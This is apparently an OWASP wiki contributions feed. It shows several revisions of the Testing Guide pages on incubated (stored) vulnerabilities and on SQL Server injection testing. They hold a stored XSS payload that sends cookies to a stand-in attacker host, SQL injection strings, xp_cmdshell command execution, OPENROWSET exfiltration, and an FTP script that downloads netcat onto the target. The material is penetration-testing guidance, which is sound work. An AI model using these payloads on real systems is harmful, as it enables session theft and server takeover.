https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=WataOWASP - User contributions [en]2026-05-13T07:47:07ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=14261Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-12-12T21:05:49Z<p>Wata: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
<br />
== Brief Summary ==<br />
Also often refered to as persistent attacks, incubated testing is a complex testing that needs more than one data validation vulnerability to work. In this section we describe a set of examples to test an Incubated Vulnerability.<BR><br />
*The attack vector needs to be persisted in the first place, it needs to be stored in the persistence layer, and this would only occur if weak data validation was present or the data arrived into the system via another channel such as an admin console or directly via a backend batch process.<br />
* Secondly once the attack vector was "recalled" the vector would need to be executed successfully. For example an incubated XSS attack would require weak output validation so the script would be delivered to the client in its executable form.<br />
<br />
== Short Description of the Issue == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see [[http://www.owasp.org/index.php/Cross_site_scripting_AoC XSS Testing]] for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy XSS-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2 [[http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection Testing]]. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4).<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
Gray/white testing techniques will be the same as previously discussed.<br />
* Input validation must be examined is key in mitigating against this vulnerability. If other systems in the enterprise use the same persistence layer they may have weak input validation and the data is perssited via a "back door".<br />
* To combat the "back door" issue for client side attacks, output validation must also be employed so tainted data shall be encoded prior to displaying to the client and hance not execute.<br />
<br />
* See Code review guide: http://www.owasp.org/index.php/Data_Validation_%28Code_Review%29#Data_validation_strategy<br />
<br />
== References ==<br />
Most of the references from the Cross-site scripting section are valid. As explained above, incubated attacks are executed when combining exploits such as XSS or SQL-injection attacks. <br />
<br />
<br />
'''Advisories'''<br><br />
<br />
* CERT(R) Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests - http://www.cert.org/advisories/CA-2000-02.html<br />
* Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability - http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/048059.html<br />
<br />
<br><br />
'''Whitepapers'''<br><br />
<br />
* Web Application Security Consortium "Threat Classification, Cross-site scripting" - http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml<br />
* Amit Klein (Sanctum) "Cross-site Scripting Explained" - http://www.sanctuminc.com/pdf/WhitePaper_CSS_Explained.pdf<br />
<br />
<br><br />
'''Tools'''<br><br />
<br />
* XSS-proxy - http://sourceforge.net/projects/xss-proxy<br />
* Paros - http://www.parosproxy.org/index.shtml<br />
* Burp Suite - http://portswigger.net/suite/<br />
* Metasploit - http://www.metasploit.com/<br />
<br />
<br><br />
<br />
{{Category:OWASP Testing Project AoC}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=14257Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-12-12T20:56:23Z<p>Wata: /* Brief Summary */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
<br />
== Brief Summary ==<br />
Also often refered to as persistent attacks, incubated testing is a complex testing that needs more than one data validation vulnerability to work. In this section we describe a set of examples to test an Incubated Vulnerability.<BR><br />
*The attack vector needs to be persisted in the first place, it needs to be stored in the persistence layer, and this would only occur if weak data validation was present or the data arrived into the system via another channel such as an admin console or directly via a backend batch process.<br />
* Secondly once the attack vector was "recalled" the vector would need to be executed successfully. For example an incubated XSS attack would require weak output validation so the script would be delivered to the client in its executable form.<br />
<br />
== Short Description of the Issue == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see [[http://www.owasp.org/index.php/Cross_site_scripting_AoC XSS Testing]] for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy XSS-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2 [[http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection Testing]]. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4).<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
Gray/white testing techniques will be the same as previously discussed.<br />
* Input validation must be examined is key in mitigating against this vulnerability. If other systems in the enterprise use the same persistence layer they may have weak input validation and the data is perssited via a "back door".<br />
* To combat the "back door" issue for client side attacks, output validation must also be employed so tainted data shall be encoded prior to displaying to the client and hance not execute.<br />
<br />
* See Code review guide: http://www.owasp.org/index.php/Data_Validation_%28Code_Review%29#Data_validation_strategy<br />
<br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
<br />
* XSS-proxy - http://sourceforge.net/projects/xss-proxy<br />
* Paros - http://www.parosproxy.org/index.shtml<br />
* Burp Suite - http://portswigger.net/suite/<br />
* Metasploit - http://www.metasploit.com/<br />
<br />
<br><br />
<br />
{{Category:OWASP Testing Project AoC}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_Incubated_Vulnerability_(OTG-INPVAL-015)&diff=13621Testing for Incubated Vulnerability (OTG-INPVAL-015)2006-11-23T20:11:40Z<p>Wata: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
<br />
== Brief Summary ==<br />
Incubated testing is a complex testing that need more that one data valition vulnerability to work. In this section we describe a set of examples to test an Incubated Vulnerability.<br />
<br />
== Short Description of the Issue == <br />
<br />
Exploitation of some vulnerabilities, or even functional features of a web application will allow an attacker to plant a piece of data that will later be retrieved by an unsuspected user or other component of the system, exploiting some vulnerability there. <br />
<br />
In a penetration test, '''incubated attacks''' can be used to assess the criticality of certain bugs, using the particular security issue found to build a client-side based attack that usually will be used to target a large number of victims at the same time (i.e. all users browsing the site). <br />
<br />
This type of asynchronous attack covers a great spectrum of attack vectors, among them the following: <br />
<br />
* File upload components in a web application, allowing the attacker to upload corrupted media files (jpg images exploiting CVE-2004-0200, png images exploiting CVE-2004-0597, executable files, site pages with active component, etc)<br />
<br />
* Cross-site scripting issues in public forums posts (see [[http://www.owasp.org/index.php/Cross_site_scripting_AoC XSS Testing]] for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board or blog in order to inject some javascript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser.<br />
<br />
* SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary Javascript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [[http://sourceforge.net/projects/xss-proxy XSS-proxy]]).<br />
<br />
* Misconfigured servers allowing installation of java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.)<br />
<br />
== Black Box testing and example ==<br />
<br />
===a. File Upload Sample:===<br />
<br />
Verify the content type allowed to upload to the web application and the resultant URL for the uploaded file. Upload a file that will exploit a component in the local user workstation when viewed or downloaded by the user. <br />
<br />
Send your victim an email or other kind of alert in order to lead him/her to browse the page. <br />
<br />
The expected result is the exploit will be triggered when the user browses the resultant page or downloads and executes the file from the trusted site. <br />
<br />
<br />
===b. XSS sample on a bulletin board===<br />
<br />
1. Introduce ''javascript'' code as the value for the vulnerable field, for instance:<br />
<br />
<nowiki><script>document.write('<img src="http://attackers.site/cv.jpg?'+document.cookie+'">')</script></nowiki><br />
<br />
2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a <nowiki>"listener"</nowiki> at ''attackers.site'' host listening for all incoming connections. <br />
<br />
3. When users browse the vulnerable page, a request containing their cookie (''document.cookie'' is included as part of the requested URL) will be sent to the ''attackers.site'' host, such as the following:<br />
<br />
<nowiki>- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE;</nowiki><br />
<nowiki>%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https://vulnerable.site/site/;</nowiki><br />
<nowiki>TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1</nowiki><br />
<br />
<br />
4. Use cookies obtained to impersonate users at the vulnerable site. <br />
<br />
<br />
===c. SQL Injection sample===<br />
<br />
Usually, this set of examples leverages XSS attacks by exploiting a SQL-injection vulnerability. The first thing to test, is whether the target site has a SQL-injection vulnerability. This is described in Section 4.2 [[http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection Testing]]. For each SQL-injection vulnerability, there is an underlying set of constraints describing the kind of queries that the attacker/pen-tester is allowed to do. The pen tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert.<br />
<br />
1. In a similar fashion as the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a ''footer'' table at the database with all footers for the web site pages, including a ''notice'' field with the legal notice that appears at the bottom of each web page. You could use the following query to inject javascript code to the ''notice'' field at the ''footer'' table in the database. <br />
<br />
SELECT field1, field2, field3<br />
FROM table_x<br />
WHERE field2 = 'x';<br />
UPDATE footer<br />
<nowiki>SET notice = 'Copyright 1999-2030%20</nowiki><br />
<nowiki><script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>'</nowiki><br />
WHERE notice = 'Copyright 1999-2030';<br />
<br />
2. Now, each user browsing the site will silently send his cookies to the ''attackers.site'' (steps b.2 to b.4).<br />
<br />
===d. Misconfigured server===<br />
<br />
Some web servers present an administration interface that may allow an attacker to upload active components of her choice to the site. This could be the case with Apache Tomcat servers that doesn’t enforce strong credentials to access its Web Application Manager (or in the case the pen testers have been able to obtain valid credentials for the administration module by other means). <br />
In this case, a WAR file can be uploaded and a new web application deployed at the site, which will not only allow the pen tester to execute code of her choice locally at the server, but also to plant an application at the trusted site, which the site regular users can then access (most probably with a higher degree of trust than when accessing a different site).<br />
<br />
As should also be obvious, the ability to change web page contents at the server, via any vulnerabilities that may be exploitable at the host which will give the attacker webroot write permissions, will also be useful towards planting such an incubated attack on the web server pages (actually, this is a known infection-spread method for some web server worms).<br />
<br />
== Gray Box testing and example == <br />
Gray/white testing techniques will be the same as previously discussed.<br />
<br />
== References ==<br />
'''Whitepapers'''<br><br />
...<br><br />
'''Tools'''<br><br />
<br />
* XSS-proxy - http://sourceforge.net/projects/xss-proxy<br />
* Paros - http://www.parosproxy.org/index.shtml<br />
* Burp Suite - http://portswigger.net/suite/<br />
* Metasploit - http://www.metasploit.com/<br />
<br />
<br><br />
<br />
{{Category:OWASP Testing Project AoC}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=13578Testing for SQL Server2006-11-22T23:09:14Z<p>Wata: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
<br><br />
In this paragraph we describe some [http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection] techniques that utilize specific features of Microsoft SQL Server.<br />
<br><br />
<br />
== Short Description of the Issue == <br />
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute of SQL code under the privileges of the user used to connect to the database.<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application that the penetration tester has to know in order to exploit them along the tests. <br />
<br />
== Black Box testing and example ==<br />
<br />
===SQL Server Peculiarities===<br />
<br />
To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Useful stored procedures include:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running. By default, only '''sysadmin''' is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)<br />
** '''xp_regread''' reads an arbitrary value from the Registry (undocumented extended procedure)<br />
** '''xp_regwrite''' writes an arbitrary value into the Registry (undocumented extended procedure)<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin''' privileges.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
<br><br />
Let's see now some examples of specific SQL Server attacks that use the aformentioned functions. Most of these examples will use the '''exec''' function.<br />
<br />
Below we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:<br />
<pre><br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
</pre><br />
Alternatively, we can use sp_makewebtask:<br />
<pre><br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
</pre><br />
A successful execution will create a file that it can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated and, even if it works to all SQL Server versions up to 2005, might be removed in the future.<br />
<br />
And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)<br />
<br />
<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
===Example 5: custom xp_cmdshell===<br />
<br />
All books and papers describing the security best practices for SQL Server recommend to disable xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.<br />
<br><br><br />
On SQL Server 2000:<br />
* If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply inject the following code:<br />
<pre><br />
sp_addextendedproc 'xp_cmdshell','xp_log70.dll'<br />
</pre><br />
* If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:<br />
<pre><br />
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS<br />
DECLARE @result int, @OLEResult int, @RunResult int<br />
DECLARE @ShellID int<br />
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT<br />
IF @OLEResult <> 0 SELECT @result = @OLEResult<br />
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)<br />
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait<br />
IF @OLEResult <> 0 SELECT @result = @OLEResult<br />
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)<br />
EXECUTE @OLEResult = sp_OADestroy @ShellID<br />
return @result<br />
</pre><br />
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_method and sp_destroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.<br />
<br><br><br />
On SQL Server 2005, xp_cmdshell can be enabled injecting the following code instead:<br />
<pre><br />
master..sp_configure 'show advanced options',1<br />
reconfigure<br />
master..sp_configure 'xp_cmdshell',1<br />
reconfigure<br />
</pre><br />
<br />
===Example 6: Referer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Example 7: Upload of executables===<br />
<br />
Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here.<br />
If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:<br />
<pre><br />
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--<br />
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- <br />
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--<br />
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--<br />
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--<br />
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--<br />
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--<br />
</pre><br />
At this point, nc.exe will be uploaded and available.<br />
<br><br />
